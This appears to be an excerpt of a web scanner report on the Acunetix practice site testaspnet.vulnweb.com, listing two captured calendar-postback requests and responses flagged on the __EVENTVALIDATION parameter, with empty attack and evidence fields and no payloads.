Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8439&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCA7GtnCdsIZGRkT%2FuMrpjol%2FKmCseSSBxYmGwMvo0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKIss%2BpDALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfHXACBnUkwjhsh2ku30%2B3etqcdY
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:19 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCA7GtnCdsIZGRkT/uMrpjol/KmCseSSBxYmGwMvo0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKIss+pDALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfHXACBnUkwjhsh2ku30+3etqcdY" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:White" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8485&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA7QqNLdsIZGRkS7BAitjHMqkbc%2B8%2FliEEBzMKsNg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKiy%2B0iAtOn6sAIArXOmMILAr%2BTx4wEAr%2BTx4wEAr%2BT%2B6MNAr%2BT%2B6MNAr%2BT78YGAr%2BT78YGAr%2BTw68DAr%2BTw68DAr%2BT98IMAr%2BT98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns%2FQwC19ns%2FQwC19mAkAQC19mAkAQC19n0%2BQIC19n0%2BQIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC%2Fw8CqOCC%2Fw8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB0EBmJ5MumAMg2%2F10TsLczK%2FVnM8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:23 GMT Content-Length: 12477
Response Body - size: 12,477 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA7QqNLdsIZGRkS7BAitjHMqkbc+8/liEEBzMKsNg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKiy+0iAtOn6sAIArXOmMILAr+Tx4wEAr+Tx4wEAr+T+6MNAr+T+6MNAr+T78YGAr+T78YGAr+Tw68DAr+Tw68DAr+T98IMAr+T98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns/QwC19ns/QwC19mAkAQC19mAkAQC19n0+QIC19n0+QIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC/w8CqOCC/w8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB0EBmJ5MumAMg2/10TsLczK/VnM8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:White" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
